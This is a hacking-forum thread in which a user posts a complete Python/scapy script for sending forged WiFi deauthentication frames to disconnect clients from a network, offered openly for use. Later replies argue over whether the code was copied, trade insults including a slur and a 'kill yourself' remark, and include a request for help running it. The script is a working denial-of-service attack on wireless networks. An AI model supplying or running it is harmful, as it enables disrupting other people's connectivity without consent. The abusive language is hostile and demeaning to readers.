Sinisterly
WiFi EMP - Disconnect all clients from WiFi - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Network Hacking (https://sinister.ly/Forum-Network-Hacking)
+--- Thread: WiFi EMP - Disconnect all clients from WiFi (/Thread-WiFi-EMP-Disconnect-all-clients-from-WiFi)

Pages: 1 2


WiFi EMP - Disconnect all clients from WiFi - MLP - 04-19-2016

Here is a neat little script I wrote a while back.
It simply runs on a device with a WiFi adapter and will disconnect all clients.

This happens by using the broadcast client ID - FF:FF:FF:FF:FF:FF
that will send all packets across any client on the network.

Code:
import sys
import os

class colors:
        GREEN = '\033[92m'
        NORMAL = '\033[0m'
        RED = '\033[91m'
        BLUE = '\033[94m'
        BLERG = '\033[95m'

if len(sys.argv) != 5:
        print 'usage: ./deauth.py interface bssid client count'
        sys.exit(1)


banner = """
___________________ ___________
\______   \_   ___ \\_   _____/
|       _/    \  \/ |    __)_
|    |   \     \____|        \
|____|_  /\______  /_______  /
        \/        \/        \/
__      __._____________.__  
/  \    /  \__\_   _____/|__|  
\   \/\/   /  ||    __)  |  |  
\        /|  ||     \   |  |  
  \__/\  / |__|\___  /   |__|  
       \/          \/          
___________   _____ __________
\_   _____/  /     \\______   \
|    __)_  /  \ /  \|     ___/
|        \/    Y    \    |    
/_______  /\____|__  /____|    
        \/         \/          
"""

print colors.GREEN + banner + colors.NORMAL

raw_input("Please hit enter to continue . . .")

from scapy.all import *

print '| EMP SCRIPT v1.0 |'

conf.iface = sys.argv[1]
bssid = sys.argv[2]
client = sys.argv[3]
amount = sys.argv[4]

conf.verb = 0

rape = RadioTap()/Dot11(type=0,subtype=12,addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)

for n in range(int(amount)):
    sendp(rape)
    print colors.NORMAL + 'Deauth sent via: ' + colors.BLERG + conf.iface + colors.GREEN + ' to BSSID: ' + colors.RED + bssid + colors.NORMAL + ' Attacking client: ' + colors.BLUE + client + colors.NORMAL

print ''
raw_input("EMP Finished attack hit enter to exit . . .")
os.system("clear")

Hope you find use for this and use it carefully.


RE: WiFi EMP - Disconnect all clients from WiFi - meow - 04-19-2016

Offensive off-hand comment that was removed; don't open if you don't want to read it:
Spoiler:
Kill yourself skid, you didn't write this shit.

All you did was take the code from https://github.com/catalyst256/MyJunk/blob/master/scapy-deauth.py and add a bunch of pointless shit around it to make it look cooler and more complex.

I'm willing to bet that your RCE "tutorial" isn't originally yours either.


RE: WiFi EMP - Disconnect all clients from WiFi - MLP - 04-19-2016

From my original version that I posted on TeaMp0isoN
http://archive.is/oa1q1

Things can be made twice buddy


RE: WiFi EMP - Disconnect all clients from WiFi - meow - 04-19-2016

(04-19-2016, 02:29 AM)RCE Wrote: From my original version that I posted on TeaMp0isoN
http://archive.is/oa1q1

Things can be made twice buddy

Right.

Things can be made twice, but you're not making anything new by copying and pasting code then adding skid code on the tops and bottoms of it.


RE: WiFi EMP - Disconnect all clients from WiFi - MLP - 04-19-2016

You can remain on some kind of attack towards my thread that's okay,
everyone can have their opinion and say as they wish.


RE: WiFi EMP - Disconnect all clients from WiFi - meow - 04-19-2016

(04-19-2016, 02:33 AM)RCE Wrote: You can remain on some kind of attack towards my thread that's okay,
everyone can have their opinion and say as they wish.

This is pseudo-intellectualism to the highest degree. I'm not even going to try and argue with you.

Spoiler:
I wish @Reiko was still a mod so that he could ban people for being retarded.



RE: WiFi EMP - Disconnect all clients from WiFi - MLP - 04-19-2016

Starfall would not have banned me anyway, but nice bro Smile.
Big words


RE: WiFi EMP - Disconnect all clients from WiFi - Dismas - 04-19-2016

(04-19-2016, 02:36 AM)meow Wrote: This is pseudo-intellectualism to the highest degree. I'm not even going to try and argue with you.

Spoiler:
I wish @Reiko was still a mod so that he could ban people for being retarded.

@"Reiko" probably wouldn't ban him.


RE: WiFi EMP - Disconnect all clients from WiFi - Num5kull - 04-23-2016

thanks! this is great!.
Just what i needed for whenever i need to bash out a de-auth.

well done


RE: WiFi EMP - Disconnect all clients from WiFi - indiaboy - 04-24-2016

please how can we run this script or how do go about it

thank